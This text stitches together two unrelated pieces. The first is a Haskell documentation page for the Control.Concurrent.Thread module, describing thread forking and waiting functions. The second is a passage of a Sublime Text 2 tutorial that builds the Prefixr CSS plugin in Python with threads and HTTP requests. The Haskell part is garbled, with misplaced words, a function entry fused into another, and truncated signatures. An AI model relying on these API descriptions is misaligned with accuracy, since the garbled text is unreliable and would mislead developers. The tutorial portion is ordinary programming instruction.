Control.Concurrent.Thread Description Standard threads extended with the ability to wait for their termination. This module exports equivalently named functions from Control.Concurrent (and GHC.Conc). Avoid ambiguities by importing this module qualified. May we suggest: import qualified Control.Concurrent.Thread as Thread ( ... ) Synopsis - data Result α - forkIO :: IO α -> IO (ThreadId, Result α) - forkOS :: IO α -> IO (ThreadId, Result α) - forkOnIO :: Int -> IO α -> IO (ThreadId, Result α) - wait :: Result α -> IO (Either SomeException α) - wait_ :: Result α -> IO () - unsafeWait :: Result α -> IO α - unsafeWait_ :: Result α -> IO () - status :: Result α -> IO (Maybe (Either SomeException α)) - isRunning :: Result α -> IO Bool The result of a thread A is an abstract type representing the result of a thread that is executing or has executed a computation of type Result α . IO α Instances Forking threads forkIO :: IO α -> IO (ThreadId, Result α)Source Sparks off a new thread to run the given IO computation and returns the ThreadId of the newly created thread paired with the Result of the thread which can be upon. waited The new thread will be a lightweight thread; if you want to use a foreign library that uses thread-local storage, use forkOS instead. GHC note: the new thread inherits the blocked state of the parent (see block). forkOS :: IO α -> IO (ThreadId, Result α)Source Like forkIO, this sparks off a new thread to run the given IO computation and returns the ThreadId of the newly created thread paired with the Result of the thread which can be upon. waitedOnIO :: Int -> IO α -> IO (ThreadId, Result α)Source). Waiting for results wait :: Result α -> IO (Either SomeException α)Source unsafeWait :: Result α -> IO αSource unsafeWait_ :: Result α -> IO ()Source Like unsafeWait in that it will rethrow the exception that was thrown in the thread but it will ignore the value returned by the thread. Querying results status :: Result.
http://hackage.haskell.org/package/threads-0.2/docs/Control-Concurrent-Thread.html
CC-MAIN-2014-42
refinedweb
315
57.91
Rechercher une page de manuel tnameserv Langue: en Version: 20 Mar 2008 (ubuntu - 07/07/09) Section: 1 (Commandes utilisateur) Sommaire references are stored in the namespace by name and each object reference-name pair is called a name binding. Name bindings may be organized under naming contexts. Naming contexts are themselves name bindings and serve the same organizational function as a file system subdirectory. All bindings are stored under the initial naming context. The initial naming context is the only persistent binding in the namespace; the rest of the namespace is lost if the Java IDL naming service process halts and restarts.. intial,); int lastIx = bindings[i].binding_name.length-1; //); } } } plus, et un borgne branleur ne peut lire en braille qu'avec le nez ;-) -+- Yvan, sur fr.rec.photo -+- Contenus ©2006-2017 Benjamin Poulain Design ©2006-2017 Maxime Vantorre
http://www.linuxcertif.com/man/1/tnameserv/
CC-MAIN-2017-51
refinedweb
140
63.7
Because some syntax uses of Python 2.x and 3.x are different, you will encounter the need to switch versions when writing and using Python programs. The following describes pyenv, a tool for switching Python versions. Install pyenv Take mac as an example. You need to install brew first. If you don't, you need to install brew and pyenv first. Now you need to set the agent on the terminal to install brew and pyenv. brew update brew install pyenv Configure zsh echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.zshrc echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.zshrc echo 'eval "$(pyenv init -)"' >> ~/.zshrc zsh Install and view py version # View installable versions pyenv install -l # Install and uninstall python 3.6.6. Note that you need to set up the terminal agent to install the py version, otherwise it may time out and cause failure pyenv install 3.6.6 pyenv uninstall 3.6.6 # View the current Python version pyenv version # View the installed Python version pyenv versions The installed version of py is in the / Users / your username /. pyenv/versions directory. ➜ versions pwd /Users/thoth/.pyenv/versions ➜ versions ls 3.6.6 ➜ versions Switch py version # Global global settings generally do not recommend changing global settings pyenv global <python Edition> # Shell session settings only affect the current shell session pyenv shell <python Edition> # Unset shell session pyenv shell --unset # Local local settings only affect the folder pyenv local <python Edition> The priority relationship is: shell > local > Global Here is an experiment. Write a small script and run it: seeversion.py import sys print(sys.version) print(sys.version_info) Verify switch to 3.3.6 # Set version ➜ program pyenv shell 3.6.6 # View version ➜ program pyenv versions system * 3.6.6 (set by /Users/thoth/program/.python-version) # Run script as expected ➜ program) Verify switch back to system default version # Set version ➜ pyenv local system # View version ➜ ~ pyenv versions * system (set by /Users/thoth/.python-version) 3.6.6 # Run script as expected ➜ ~) Conclusion: I feel that global is the directory you run in the terminal, which is effective, but this setting is too wasteful. After all, we usually only run py scripts in a few fixed directories. shell means that the terminal you are currently opening is valid, and it is invalid after closing. local is, for example, if you cd into the program directory, it is valid in the current. Program directory. Other directories are invalid. Use example with ide To let the ide run the version you installed, just set the running version path to / Users/thoth/.pyenv/versions/3.6.6/bin/python. Some differences with virtualenv pyenv can easily switch between different versions of terminal and ide. But for developers who need to develop different py programs, different projects mean that each project has different extended class libraries, which are all installed in the corresponding version of python environment, making them feel uncomfortable, inconvenient to manage, and bloated. It is hoped that the environment of each project is independent, pure and clean. With this critical need, virtualenv was born for it. Reference
https://programmer.group/python-switch-version-artifact-pyenv.html
CC-MAIN-2020-24
refinedweb
518
57.87
We are the operations team that runs the Microsoft.com sites. Introduction – September 5th, 2007 XAML rendering for web applications, JavaScript API .NET Framework version 3.5 November 19th, 2007 Language integrated query (LINQ) Visual Studio 2008 IDE for all things .NET Silverlight version 2.0 Beta 1 on March 5, 2008, RTM late summer 2008 Managed CLR, C#, .NET Framework, greater parity with WPF XAML Expression Blend v1 May 2007, v2 beta March 2008 XAML user experience (UX) IDE If you fancy yourself an adept .NET developer, you had better be ramped up on these new technologies. Today, if you are considering user interface/experience development, you should consider leveraging the rich UX elements and platform independence offered by Silverlight, and the power of authoring with the Expression Studio. If you are designing some middleware, you should consider developing software services using Windows Communication Foundation (WCF) technology. For coding backend data access it is now wise to evaluate LINQ to Entities or LINQ to SQL techniques. And before you write any C# foreach loop on an array or other collection, you might be able to write it better using LINQ to Objects techniques instead. The bottom line here is that .NET developers have many new tools available to leverage for developing just about any application. Using these new techniques should eventually accelerate the delivery of applications that look better and are better-built. I say “eventually” because these new tricks will take some ramp up time to learn and master. And first, the developer needs to be aware of them and know how to judiciously leverage them. However, we are talking about a pretty big load of new stuff to digest here. So let us discuss just one example of one these new tricks: LINQ to SQL. The primary purpose of rest of this article is to illustrate one simple example application of LINQ to SQL. Simple LINQ to SQL A couple of months ago, I was tasked with developing an internal application that would periodically transfer some data from a SQL database into a monitoring system. The SQL database was a Hewlett Packard Systems Insight Manager installation. The monitoring system is a Microsoft Systems Center Operations Manager (SCOM) 2007 installation, accessed via the System Center Operations Manager 2007 SDK, and the Microsoft.EnterpriseManagement Namespace. LINQ to SQL is well-suited for this situation as it helps avoid changing either the source or destination installations, and with a minimal “footprint” of moving parts. With a single stand-alone console application, I was able to get this job done, and with a not-too-kludgey implementation. I developed a single, modest-length class file to do the whole thing, with no hard-coded transact SQL code! I won’t drag you through my entire solution. I pared down the code to illustrate just the LINQ to SQL mechanics, as run against that Hewlett Packard Systems Insight Manager installation: using System; using System.Data.Linq; using System.Data.Linq.Mapping; namespace LinqLite class Program { static void Main(string[] args) { DataContext db = new DataContext("YOUR HPSIM SQL SERVER CONNECTION STRING GOES HERE"); Table<CIM_Chassis> TableCIM_Chassis = db.GetTable<CIM_Chassis>(); Table<Devices> TableDevices = db.GetTable<Devices>(); Table<Notices> TableNotices = db.GetTable<Notices>(); var LinqQuery = from c in TableCIM_Chassis join d in TableDevices on c.NodeID equals d.DeviceKey join n in TableNotices on d.DeviceKey equals n.DeviceKey where n.NoticeId > 35000 //TODO: make this a LastIdProcessed variable orderby n.NoticeId select new { n.NoticeId, n.NoticeSeverity, n.Generated, n.Comments, d.DeviceKey, d.ProductName, d.Name }; foreach (var qdata in LinqQuery) Console.WriteLine(string.Format("{0}\t{1}\t{2}\t{3}\t{4}\t{5}\t{6}" , qdata.NoticeId , qdata.NoticeSeverity , qdata.Generated , qdata.Comments , qdata.DeviceKey , qdata.ProductName , qdata.Name )); Console.ReadLine(); } } [Table] class CIM_Chassis [Column] public long NodeID = 0; class Devices [Column] public int DeviceKey = 0; [Column] public string ProductName = string.Empty; [Column] public string Name = string.Empty; class Notices [Column] public int NoticeId = 0; [Column] public int NoticeSeverity = 0; [Column] public long Generated = 0; [Column] public string Comments = string.Empty; } I call this solution simple LINQ to SQL primarily because it is all done in one code file, and does not involve using the fancy Visual Studio 2008 Object Relational Designer (O/R Designer). When you use the O/R Designer, you get a handy GUI for assembling some classes that map to the SQL data. You can easily end up with several auto-generated class files with many code stubs, just in case you might need them. You use these classes in your LINQ queries to access the data. But if you are doing simple read-only selections, you can hand-code the classes, make them lean, and place them in-line in the code, like I did: These class definitions only list the fields that I am interested in, and not the entire tables. Another simple part of my example is the brief “using” list: Hopefully my core LINQ selection code is not too hard to decipher – seven fields selected from two joined tables, with a third table joined in to filter the data to only notices for “chassis” devices. First, a DataContext is created to set up a connection the SQL Server database. Next, references are made to the table classes using DataContext.GetTable(TEntity) Generic Method: Then the LINQ query is defined, complete with joins, a where clause, and orderby: I put the “TODO” comment on the where clause to indicate that a LastIdProcessed variable could be persisted and recalled to use for filtering the notices data. Thus, you might fetch only new notices that have occurred after the last time this process was executed. Finally, a foreach construct is employed to “harvest” and display the selected data: , qdata.Name The Console.ReadLine() at the very end merely serves as a way to pause program execution, so the displayed data can be viewed before the console window disappears. MSDN’s “LINQ to SQL: .NET Language-Integrated Query for Relational Data” article does well to explain more about how this code works. Conclusion If you would like to receive an email when updates are made to this post, please register here RSS Introduction – Modern .NET Development It took me a while to realize it, but Microsoft .NET application Good blog. But I'd have to say linq syntax is not intuitive to me and nothing in msdn has helped. I think the problem is you can't do much just from seeing a few examples. You also need to understand the full syntax as well. Hi, Mark. Thanks for the comment. I totally agree with you -- LINQ is not very intuitive to apply. And the examples don't help that much, because it is a deep subject about a sophisticated, powerful .NET feature. First you have the many different varieties of LINQ: SQL, DataSet, XML, Objects, Entities. Each one of these seems to have its own nuances and is applicable in different scenarios. You can read about these but actually experimenting seems to be key. The first time I tried to apply LINQ, I did not have much time to explore it, and ended up not using it. In my second run at it, I had more time. But, it took me quite a while to distill what I needed from numerous examples and make enough sense out of it to get the job done. An important factor for me was that I was only reading data, and not writing it. I hear that if you need to read and write, it makes sense to employ the Visual Studio 2008 Object Relational Designer and use LINQ to Entities. The entities end up being logical representations of business objects in your data store. MSDN’s “LINQ to SQL: .NET Language-Integrated Query for Relational Data” article could help you. Also, is a useful tool for exploring the syntax and the examples are pretty good in there. Good luck, Eric
http://blogs.technet.com/mscom/archive/2008/04/16/modern-net-development-and-the-joy-of-simple-linq-to-sql.aspx
crawl-002
refinedweb
1,332
55.64
-2018 03:00 PM - edited 11-13-2018 06:54 PM I have been unable to synchronize the RFSoC ADCs when the NCO is enabled. This is my procedure. Please correct / comment: 1. Enable all clocks and verify they are correct: Tile 224, 225, 226, and 227 RF clocks at 3932.16 MHz, Tile 228 SYSREF Clock at 6.144 MHz, FPGA PL SYSREF Clock at 6.144 MHz 2. Load the Bitstream. The RF Data Converter block has the ADC Tiles and DAC Tile 0 Enabled, Multi-Tile Sync Enabled for the ADC and DAC Tiles, the Decimation Setting, NCO Frequency, Mixer Mode, and other parameters set to the desired values. Here is a screenshot of the core configuration GUI: 3. After the bitstream is loaded, I run the software setup, I first run XRFdc_Reset() on all Tiles, then , then XRFdc_StartUp() on all Tiles, then XRFdc_SetupFIFO() on all tiles. 4. Next in the code, I setup the Mixer Settings for all ADC Tiles: 5. I then run the Multi-Tile Sync for the ADC 6. I get an MTS good result: The problem is that the ADC outputs are not synchronized and consistent from run to run. If I run this procedure ten times, I will get ten different phase deltas between the signals out of tile 224 and 225. What am I doing incorrectly in the sequence? Is there a document other than the RF Data Converter User Guide that has step-by-step instructions for synchronizing the ADCs with an active NCO? 11-14-2018 03:55 AM Is this your own board or ZCU111? Have you followed the SYSREF guidelines on the PCB? Can you try to run the MTS example from the SW driver? have you tried getting it to run and not setting a target latency? Are you able to check the metal log to see what is happenning at each step. It is a good idea to enable the metal log at least for error and info messages 11-14-2018 06:25 AM It is the ZCU111. Which SW driver and which MTS example are you referring to? I will try not setting target latency and enable/check the metal log. Will report back soon... 11-14-2018 06:41 AM if you look in your SDK install Say: C:\Xilinx\SDK\2018.2\data\embeddedsw\XilinxProcessorIPLib\drivers\rfdc_v4_0\examples you will see xrfdc_mts_example.c import that into an empty application in your SDK project and give it a try. If you set a target latency and subsequently get a latency that is higher your MTS will error out. To set the target properly you have to run with the target set to 0, find the highest latency and add a margin to it. I would try without a target and enable the metal logging for infos and errors. I attached the example to the last post. 11-14-2018 08:12 AM The missing piece was the command to reset the NCO Phase: I used the PL event instead of the SYSREF event to reset the phase because once I kick off the SYSREF clock from the LMK04208 onboard the KCU111 I don't really have a good way to pause it. With the PL event (on the RTS bus), I can create a one-shot type event in the fabric. If using SYSREF, is the correct procedure to disable the signal until after the registers are setup and before the MTS procedure is performed? 11-19-2018 03:42 AM I need to check that reset NCO phase is dependent on the tile event. We expect that the SYSREF is running for the duration of MTS and can then be gated exeternally so that we could do a synchronous update to NCOs etc. (2018.3 will enable fast NCO updates) Let me double check it. 01-08-2019 09:16 AM I am having trouble synchronizing all ADCs with NCOs Enabled too. How are the NCO Phase's synchronized across multiple tiles? My current steps are: 1) Call XRFdc_MTS_Sysref_Config to disable SYSREF 2) Call XRFdc_SetMixerSettings to set up for complex and NCO enabled and eventSource set to SYSREF 3) Call XRFdc_ResetNCOPhase 4) Call XRFdc_Startup 5) Call XRFdc_MultiConverter_Init 6) Call XRFdc_MTS_Sysref_Config to enable SYSREF 7) Call XRFdc_MultiConverter_Sync My SYSREF runs continuously, so I disable it using API call before setting up the mixers and NCO. I suppose I have a race condition when I turn it back on before calling MultiConverter_Sync. What I am seeing is that the Phases aren't synchronized across tiles. Any suggestions? Thanks!
https://forums.xilinx.com/t5/UltraScale-Architecture/Procedure-For-Multi-Tile-Synchronization-of-RFSoC-ADCs-With-NCOs/td-p/909773
CC-MAIN-2019-04
refinedweb
766
71.75
view raw According to C++11 specification: The results of includingin a translation unit shall be as ifin a translation unit shall be as if <iostream>defined an instance ofdefined an instance of <iostream>with static storage duration. Similarly, the entire program shall behave as if there were at leastwith static storage duration. Similarly, the entire program shall behave as if there were at least ios_base::Init one instance ofwith static storage durationwith static storage duration ios_base::Init // A.cpp #include <iostream> unsigned long foo() { cerr << "bar"; return 42; } // B.cpp extern unsigned long foo(); namespace { unsigned long test() { int id = foo(); return id; } unsigned long id = test(); } int main() { return 0; } cerr <iostream> The full quote of the paragraph includes: The objects are constructed and the associations are established at some time prior to or during the first time an object of class ios_base::Init is constructed, and in any case before the body of main begins execution. 293) And with the footnote 293) If it is possible for them to do so, implementations are encouraged to initialize the objects earlier than required. So, the guarantee is that the iostreams will work at the latest when entering main. There is no strict requirement that they should work earlier, unless the translation unit includes <iostream>. You have found a way to circumvent this! When calling foo() from B.cpp, the ios_base::Init instance included in A.cpp may, or may not, have been initialized.
https://codedump.io/share/TKCXzkRdNsPH/1/static-order-initialization-fiasco-iostream-and-c11
CC-MAIN-2017-22
refinedweb
244
60.24
how would i go about converting a string to a double? Printable View how would i go about converting a string to a double? 1. Use the atof function: 2. Use stringstreams:2. Use stringstreams:Code: #include <iostream> #include <string> #include <cstdlib> using namespace std; int main() { string str("19.874"); double d; // Use atof to convert string to double d = atof(str.c_str()); // Output double value cout << d << endl; return 0; } Code: #include <iostream> #include <string> #include <sstream> using namespace std; int main() { string str("19.874"); stringstream sstr(str); double d; // Extract double value from stringstream sstr >> d; // Output double value cout << d << endl; return 0; } this is how you can do it in C not C++ hope it helps [edit1] took me a little while to find the correct link. if you saw this with the old link, sorry to confuse you. here is the index to the site with good details if all else fails google it. [/edit1] thanks for that... also how do you convert a double to a string? using <sstream>: Code: #include <sstream> using namespace std; string makeString(double d) { ostringstream ss; ss<<d<<flush; return ss.str(); } here is another link i found that might be of assistance to you. all i did again was run a search on google to find it. it uses stringstream to convert from and to the formats your looking for.
http://cboard.cprogramming.com/cplusplus-programming/63524-converting-string-int-double-printable-thread.html
CC-MAIN-2014-42
refinedweb
234
81.93
Hello, This is my first post on DaniWeb and will probably not be the last so I hope I'm doing this right: I'm currently working on a Sudoku Solver that allows the user to type in the name of a Sudoku text file that looks like this: 6 8 . . . . . 5 . . . . . . 5 . . . . . 3 8 . . 2 6 . 1 . 7 . 2 . . . . . . 9 5 . 8 6 . . . . . . 1 . 7 . 2 . 2 1 . . 9 4 . . . . . 4 . . . . . . 3 . . . . . 2 8 and then the data will be read in to a 2D array and solved from there. I have tried many different ways to do this from using a Scanner to a BufferReader etc., but the way I have it now that a TA suggested was to read the file from a Scanner, put the file in as a parameter for a Sudoku object and then read the data from there. But everytime I run the program, it runs in to an infinite loop and doesn't do anything.... I wasn't sure if it has something to do with the code I have or where the files are being stored because every other idea I have tried to accomplish this has produced File Not Found errors. I have posted the Sudoku Application class I have (hope these code tags work :) ): public class SudokuApp { public static void main (String[] args) throws IOException { Scanner glaDOS = new Scanner (System.in); System.out.print("PLEASE ENTER A VALID FILE NAME THAT CONTAINS A SUDOKU: "); File sudokuFile = new File (glaDOS.next()); Sudoku puzzle = new Sudoku (glaDOS); System.out.println ("Unsolved: "); System.out.println (puzzle); System.out.println ("Solved: " ); System.out.println (puzzle); System.out.println("Backtracking steps: "); } And the Sudoku constructor class I currently have that puts the data in to a 2D array: public Sudoku (Scanner sudokuReader) { int[][] puzzle = new int[9][9]; for (row = 0; row < 9; row++) { for (col = 0; col < 9; col++) { if(sudokuReader.hasNextInt()) { num = sudokuReader.nextInt(); this.puzzle[row][col] = num; col++; if (col == 8) row++; } else if (row == 8) return; } } I am really enjoying being part of this community so far, am looking forward to responses and Thank You to all for your help!
https://www.daniweb.com/programming/software-development/threads/175519/first-post-sudoku-solver-problems
CC-MAIN-2017-09
refinedweb
361
67.28
A wrapper for create_connection() returning a (reader, writer) pair. The reader returned is a StreamReader instance; the writer is a StreamWriter instance. The arguments are all the usual arguments to BaseEventLoop.create_connection() except protocol_factory; most common are positional host and port, with various optional keyword arguments following. Additional optional keyword arguments are loop (to set the event loop instance to use) and limit (to set the buffer limit passed to the StreamReader). (If you want to customize the StreamReader and/or StreamReaderProtocol classes, just copy the code – there’s really nothing special here except some convenience.) This function is a coroutine. Start a socket server, with a callback for each client connected. The first parameter, client_connected_cb, takes two parameters: client_reader, client_writer. client_reader is a StreamReader object, while client_writer is a StreamWriter object. This. The return value is the same as create_server(). Additional optional keyword arguments are loop (to set the event loop instance to use) and limit (to set the buffer limit passed to the StreamReader). The return value is the same as create_server(), i.e. a AbstractServer object which can be used to stop the service. This function is a coroutine.. Transport. Return True if the transport supports write_eof(), False if not. See WriteTransport.can_write_eof(). Close the transport: see BaseTransport.close(). Wait until the write buffer of the underlying transport is flushed. This method has an unusual return value. The intended use is to write: w.write(data) yield from w.drain() When there’s nothing to wait for, drain() returns (), and the yield-from continues immediately. When the transport buffer is full (the protocol is paused), drain() creates and returns a Future and the yield-from will block until that Future is completed, which will happen when the buffer is (partially) drained and the protocol is resumed. to accidentally call inappropriate methods of the protocol.) Total number of expected bytes (int). Read bytes string before the end of stream was reached (bytes). Simple example querying HTTP headers of the URL passed on the command line: import asyncio import urllib.parse import sys @asyncio.coroutine def print_http_headers(url): url = urllib.parse.urlsplit(url) reader, writer = yield from asyncio.open_connection(url.hostname, 80) query = ('HEAD {url.path} HTTP/1.0\r\n' 'Host: {url.hostname}\r\n' '\r\n').format(url=url) writer.write(query.encode('latin-1')) while True: line = yield from reader.readline() if not line: break line = line.decode('latin1').rstrip() if line: print('HTTP header> %s' % line) url = sys.argv[1] loop = asyncio.get_event_loop() task = asyncio.async(print_http_headers(url)) loop.run_until_complete(task) loop.close() Usage: python example.py
http://docs.python.org/dev/library/asyncio-stream.html
CC-MAIN-2014-10
refinedweb
432
52.87
C++ Sorting Strings by writing a Custom Sort Method Hello Everyone! In this tutorial, we will learn how to sort Strings on the basis of length using a Custom Sort Method. Custom Sort Method: Whenever we need to explicitly determine the condition for sorting, we need to create this method to define the logic. For a better understanding of its implementation, refer to the well-commented CPP code given below. Code: #include <iostream> #include <bits/stdc++.h> using namespace std; //Returns true if first string is of longer length than second bool cmp(string x, string y) { int n = x.length(); int m = y.length(); if (n > m) return true; else return false; } //Function to print the elements of the unordered set using an iterator void show(unordered_set<string> s) { //declaring an iterator to iterate through the unordered set unordered_set<string>: Strings on the basis of length, strings) unordered_set<string> s; //Filling the elements by using the insert() method. cout << "\n\nFilling the Unordered Set with strings in random order."; //Unlike Set, this is not automatically sorted s.insert("Study"); s.insert("Tonight"); s.insert("Aditya"); s.insert("Abhishek"); s.insert("C++"); s.insert("Hi"); cout << "\n\nThe elements of the Unordered Set before sorting are:\n "; show(s); //Declaring a vector and initializing it with the elements of the unordered set vector<string> v(s.begin(), s.end()); //Sorting the vector elements in descending order of their length using a custom comparator sort(v.begin(), v.end(), cmp); cout << "\n\nThe elements of the Unordered Set after sorting in descending Order of their length using a custom comparator are: \n"; //declaring an iterator to iterate through the vector vector<string>: writing a Custom Sort method to sort an Unordered Set and its implementation in CPP. For any query, feel free to reach out to us via the comments section down below. Keep Learning : )
https://studytonight.com/cpp-programs/cpp-sorting-strings-by-writing-a-custom-sort-method
CC-MAIN-2021-04
refinedweb
314
51.28
[ ] Rick Hillegas commented on DERBY-6600: -------------------------------------- I have tried loading the Lucene jar files themselves into the database. The plugin will not run in this configuration. I believe that is because the class loader for code in derbyoptionaltools.jar is unable to see classes which are only visible to the class loader bound to derby.database.classpath. I have tried to also load derbyoptionaltools into the database. Same problem. It may be that any class in the org.apache.derby namespace must be resolved by the JVM class path and cannot refer to classes only visible to the class loader bound to derby.database.classpath. So, for the moment, users must be content with the advice given in the user documentation: Put derbyoptionaltools.jar on the JVM class path alongside the other Derby jars, and put the Lucene jars there too. > Make the Lucene plugin use the database class path to resolve ANALYZERMAKERs and QUERYPARSERMAKERs > -------------------------------------------------------------------------------------------------- > > Key: DERBY-6600 > URL: > Project: Derby > Issue Type: Bug > Components: SQL > Reporter: Rick Hillegas > Assignee: Rick Hillegas > Attachments: derby-6600-01-aa-useDBclasspath.diff, derby-6600-02-aa-addAPIpackage.diff > > > You get a ClassNotFoundException if you try to use an Analyzer or a QueryParser stored in a jar file in the database. This is probably easy to fix: the class resolution needs to use the database class loader. -- This message was sent by Atlassian JIRA (v6.2#6252)
http://mail-archives.apache.org/mod_mbox/db-derby-dev/201406.mbox/%3CJIRA.12718366.1401884795979.83134.1402077721912@arcas%3E
CC-MAIN-2018-51
refinedweb
233
55.03
Sublime Text 2 is a highly customizable text editor that has been increasingly capturing the attention of coders looking for a tool that is powerful, fast and modern. Today, we're going to recreate my popular Sublime plugin that sends CSS through the Nettuts+ Prefixr API for easy cross-browser CSS. When finished, you’ll have a solid understanding of how the Sublime Prefixr plugin is written, and be equipped to start writing your own plugins for the editor! Preface: Terminology and Reference Material The extension model for Sublime Text 2 is fairly full-featured. The extension model for Sublime Text 2 is fairly full-featured. There are ways to change the syntax highlighting, the actual chrome of the editor and all of the menus. Additionally, it is possible to create new build systems, auto-completions, language definitions, snippets, macros, key bindings, mouse bindings and plugins. All of these different types of modifications are implemented via files which are organized into packages. A package is a folder that is stored in your Packages directory. You can access your Packages directory by clicking on the Preferences > Browse Packages… menu entry. It is also possible to bundle a package into a single file by creating a zip file and changing the extension to .sublime-package. We’ll discuss packaging a bit more further on in this tutorial. Sublime comes bundled with quite a number of different packages. Most of the bundled packages are language specific. These contain language definitions, auto-completions and build systems. In addition to the language packages, there are two other packages: Default and User. The Default package contains all of the standard key bindings, menu definitions, file settings and a whole bunch of plugins written in Python. The User package is special in that it is always loaded last. This allows users to override defaults by customizing files in their User package. During the process of writing a plugin, the Sublime Text 2 API referencewill be essential. During the process of writing a plugin, the Sublime Text 2 API referencewill be essential. In addition, the Default package acts as a good reference for figuring out how to do things and what is possible. Much of the functionality of the editor is exposed via commands. Any operation other than typing characters is accomplished via commands. By viewing the Preferences > Key Bindings - Defaultmenu entry, it is possible to find a treasure trove of built-in functionality. Now that the distinction between a plugin and package is clear, let’s begin writing our plugin. Step 1 - Starting a Plugin Sublime comes with functionality that generates a skeleton of Python code needed to write a simple plugin. Select the Tools > New Plugin…menu entry, and a new buffer will be opened with this boilerplate. import sublime, sublime_plugin class ExampleCommand(sublime_plugin.TextCommand): def run(self, edit): self.view.insert(edit, 0, "Hello, World!") Here you can see the two Sublime Python modules are imported to allow for use of the API and a new command class is created. Before editing this and starting to create our own plugin, let’s save the file and trigger the built in functionality. When we save the file we are going to create a new package to store it in. Press ctrl+s (Windows/Linux) or cmd+s (OS X) to save the file. The save dialog will open to the User package. Don’t save the file there, but instead browse up a folder and create a new folder named Prefixr. Packages/ … - OCaml/ - Perl/ - PHP/ - Prefixr/ - Python/ - R/ - Rails/ … Now save the file inside of the Prefixr folder as Prefixr.py. It doesn’t actually matter what the filename is, just that it ends in .py. However, by convention we will use the name of the plugin for the filename. Now that the plugin is saved, let’s try it out. Open the Sublime console by pressing ctrl+`. This is a Python console that has access to theAPI. Enter the following Python to test out the new plugin: view.run_command('example') You should see Hello World inserted into the beginning of the plugin file. Be sure to undo this change before we continue. Step 2 - Command Types and Naming For plugins, Sublime provides three different types of commands. - Text commands provide access to the contents of the selected file/buffer via a Viewobject - Window commands provide references to the current window via a Windowobject - Application commands do not have a reference to any specific window or file/buffer and are more rarely used Since we will be manipulating the content of a CSS file/buffer with this plugin, we are going to use the sublime_plugin.TextCommand class as the basis of our custom Prefixr command. This brings us to the topic of naming command classes. In the plugin skeleton provided by Sublime, you’ll notice the class: class ExampleCommand(sublime_plugin.TextCommand): When we wanted to run the command, we executed the following code in the console: view.run_command('example') Sublime will take any class that extends one of the sublime_plugin classes ( TextCommand, WindowCommand or ApplicationCommand), remove the suffix Command and then convert the CamelCaseinto underscore_notation for the command name. Thus, to create a command with the name prefixr, the class needs to be PrefixrCommand. class PrefixrCommand(sublime_plugin.TextCommand): Step 3 - Selecting Text One of the most useful features of Sublime is the ability to have multiple selections. Now that we have our plugin named properly, we can begin the process of grabbing CSS from the current buffer and sending it to the Prefixr API. One of the most useful features of Sublime is the ability to have multiple selections. As we are grabbing the selected text, we need to write our plug into handle not just the first selection, but all of them. Since we are writing a text command, we have access to the current view via self.view. The sel() method of the View object returns an iterable RegionSet of the current selections. We start by scanning through these for curly braces. If curly braces are not present we can expand the selection to the surrounding braces to ensure the whole block is prefixed. Whether or not our selection included curly braces will also be useful later to know if we can tweak the whitespace and formatting on the result we getback from the Prefixr API. braces = False sels = self.view.sel() for sel in sels: if self.view.substr(sel).find('{') != -1: braces = True This code replaces the content of the skeleton run() method. If we did not find any curly braces we loop through each selection and adjust the selections to the closest closing curly brace. Next, we use the built-in command expand_selection with the to arg set to brackets to ensure we have the complete contents of each CSS block selected. if not braces: new_sels = [] for sel in sels: new_sels.append(self.view.find('\}', sel.end())) sels.clear() for sel in new_sels: sels.add(sel) self.view.run_command("expand_selection", {"to": "brackets"}) If you would like to double check your work so far, please compare the source to the file Prefixr-1.py in the source code zip file. Step 4 - Threading To prevent a poor connection from interrupting other work, we need to make sure that the Prefixr API calls are happening in the background. At this point, the selections have been expanded to grab the full contents of each CSS block. Now, we need to send them to the Prefixr API. This is a simple HTTP request, which we are going to use the urllib and urllib2 modules for. However, before we start firing off web requests, we need to think about how a potentially laggy web request could affect the performance of the editor. If, for some reason, the user is on a high-latency, or slow connection, the requests to the Prefixr API could easily take a couple of seconds or more. To prevent a poor connection from interrupting other work, we need to make sure that the Prefixr API calls are happening in the background. If you don't know anything about threading, a very basic explanation is that threads are a way for a program to schedule multiple sets of code to run seemingly at the same time. It is essential in our case because it lets the code that is sending data to, and waiting for a response from, the Prefixr API from preventing the rest of the Sublime user interface from freezing. Step 5 - Creating Threads We will be using the Python threading module to create threads. To use the threading module, we create a new class that extends threading.Thread called PrefixrApiCall. Classes that extend threading.Thread include a run() method that contains all code to be executed in the thread. class PrefixrApiCall(threading.Thread): def __init__(self, sel, string, timeout): self.sel = sel self.original = string self.timeout = timeout self.result = None threading.Thread.__init__(self) def run(self): try: data = urllib.urlencode({'css': self.original}) request = urllib2.Request('', data, headers={"User-Agent": "Sublime Prefixr"}) http_file = urllib2.urlopen(request, timeout=self.timeout) self.result = http_file.read() return except (urllib2.HTTPError) as (e): err = '%s: HTTP error %s contacting API' % (__name__, str(e.code)) except (urllib2.URLError) as (e): err = '%s: URL error %s contacting API' % (__name__, str(e.reason)) sublime.error_message(err) self.result = False Here we use the thread __init__() method to set all of the values that will be needed during the web request. The run() method contains the code toset up and execute the HTTP request for the Prefixr API. Since threads operate concurrently with other code, it is not possible to directly return values. Instead we set self.result to the result of the call. Since we just started using some more modules in our plugin, we must add them to the import statements at the top of the script. import urllib import urllib2 import threading Now that we have a threaded class to perform the HTTP calls, we need to create a thread for each selection. To do this we jump back into the run() method of our PrefixrCommand class and use the following loop: threads = [] for sel in sels: string = self.view.substr(sel) thread = PrefixrApiCall(sel, string, 5) threads.append(thread) thread.start() We keep track of each thread we create and then call the start() method to start each. If you would like to double check your work so far, please compare the source to the file Prefixr-2.py in the source code zip file. Step 6 - Preparing for Results Now that we've begun the actual Prefixr API requests we need toset up a few last details before handling the responses. First, we clear all of the selections because we modified them earlier. Later we will set them back to a reasonable state. self.view.sel().clear() In addition we start a new Edit object. This groups operations for undo and redo. We specify that we are creating a group for the prefixr command. edit = self.view.begin_edit('prefixr') As the final step, we call a method we will write next that will handle the result of the API requests. self.handle_threads(edit, threads, braces) Step 7 - Handling Threads At this point our threads are running, or possibly even completed. Next, we need to implement the handle_threads() method we just referenced. This method is going to loop through the list of threads and look for threads that are no longer running. def handle_threads(self, edit, threads, braces, offset=0, i=0, dir=1): next_threads = [] for thread in threads: if thread.is_alive(): next_threads.append(thread) continue if thread.result == False: continue offset = self.replace(edit, thread, braces, offset) threads = next_threads If a thread is still alive, we add it to the list of threads to check again later. If the result was a failure, we ignore it, however for good results we call a new replace() method that we'll be writing soon. If there are any threads that are still alive, we need to check those again shortly. In addition, it is a nice user interface enhancement to provide an activity indicator to show that our plugin is still running. if len(threads): # This animates a 